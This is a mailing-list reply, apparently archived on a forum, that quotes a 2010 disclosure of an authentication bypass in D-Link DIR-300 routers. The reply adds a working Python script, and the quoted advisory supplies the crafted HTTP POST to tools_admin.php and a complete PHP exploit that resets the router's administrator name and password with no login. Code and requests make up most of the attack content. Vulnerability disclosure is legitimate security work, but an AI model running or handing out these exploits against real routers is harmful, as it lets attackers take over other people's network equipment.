Re: D-Link DIR-300 authentication bypass
Using Phyton and Requests (must personalise router ip):
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import requests
payload =3D {'ACTION_POST': 'LOGIN', 'LOGIN_USER': 'a', 'LOGIN_PASSWD': 'b'=
, 'login':'+Log+In+', 'NO_NEED_AUTH': '1', 'AUTH_GROUP': '0', 'admin_name':=
'admin', 'admin_password1': ''}
r =3D requests.post("http://192.168.0.1:80/tools_admin.php", params=3Dpaylo=
ad)
Il giorno marted=C3=AC 9 novembre 2010 10:05:12 UTC+1, Karol Celi=C5=84ski =
ha scritto:
> [intro]
> Hello, I found security bug in D-Link DIR-300 wireless router. It can
> be used to bypass authentication mechanizm by attacker with access to
> web interface. I reported it to D-Link but they are not replying for
> my emails. According to other D-Link security holes and their status I
> think that they won't reply, so I decided to write about it here.
>=20
> [Technical details]
>=20
> Control panel script - tools_admin.php allows attacker to change
> administrator name, password and other variables without any
> authorization by sending specially crafted http post request such as:
>=20
> ---cut here---
> POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
> Host: 192.168.1.2
> Keep-Alive: 115
> Content-Type: application/x-www-form-urlencoded
> Content-length: 0
>=20
> ACTION_POST=3DLOGIN&LOGIN_USER=3Da&LOGIN_PASSWD=3Db&login=3D+Log+In+&NO_N=
EED_AUTH=3D1&AUTH_GROUP=3D0&admin_name=3Dadmin&admin_password1=3DuhOHahEh
> ---cut here---
>=20
> If attacker makes this request to the control panel, the
> administrator username is set to admin with password ,,uhOHahEh".
>=20
> [Affected]
>=20
> - All known D-Link DIR-300 firmware (ie. 2.01B1, 1.04, 1.05).
> - There is possibility that other dlink devices which use the same php
> scripts in control panel are affected. I'm not able to check it
> because I don't have devices for tests. I'm counting on you ;->
>=20
> [Code]
>=20
> ---cut here---
> <?php
> if(sizeof($argv)!=3D4) {
> echo "Usage: php5 $argv[0] <router ip addres> <port>
> <admin password>\n";
> exit;
> }
> $ch=3Dcurl_init();
> curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.ph=
p");
> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
> curl_setopt($ch, CURLOPT_PORT, $argv[2]);
> curl_setopt($ch, CURLOPT_POST, 1);
> curl_setopt($ch, CURLOPT_POSTFIELDS,
> "ACTION_POST=3DLOGIN&LOGIN_USER=3Da&LOGIN_PASSWD=3Db&login=3D+Log+In+&NO_=
NEED_AUTH=3D1&AUTH_GROUP=3D0&admin_name=3Dadmin&admin_password1=3D".urlenco=
de($argv[3]));
> echo "+ starting request\n";
> $out =3D curl_exec($ch);
> if($out=3D=3D=3Dfalse) {
> echo "- Error: could not connect (
> http://$argv[1]:$argv[2]/tools_admin.php).\n";
> exit;
> } else
> echo "+ request sended\n";
> curl_close($ch);
> if(stripos($out,"Successfully")=3D=3D=3Dfalse) {
> echo "- something goes wrong (check answer - answer.html)=
!\n";
> $f=3Dfopen("answer.html","w"); fwrite($f,$out); fclose($f=
);
> exit;
> }
> else
> echo "+ ok, now you can login using l: admin p:$argv[3]\n=
";
> ?>
> ---cut here---
>=20
> [History]
>=20
> - Information sent to vendor 07.08.2010
> - No response
> - Information resended to vendor 07.31.2010
> - No response from vendor
>=20
>=20
> [Credits]
> Karol Celi=C5=84ski ( Celin )
> Pentester/Researcher @ Safe Computing
>=20
> [Contact]
>=20
> karol at celin dot pl
>=20
> [Greetz]
> Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski,
> Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing
> members.
討論串 (同標題文章)
完整討論串 (本文為第 9 之 9 篇):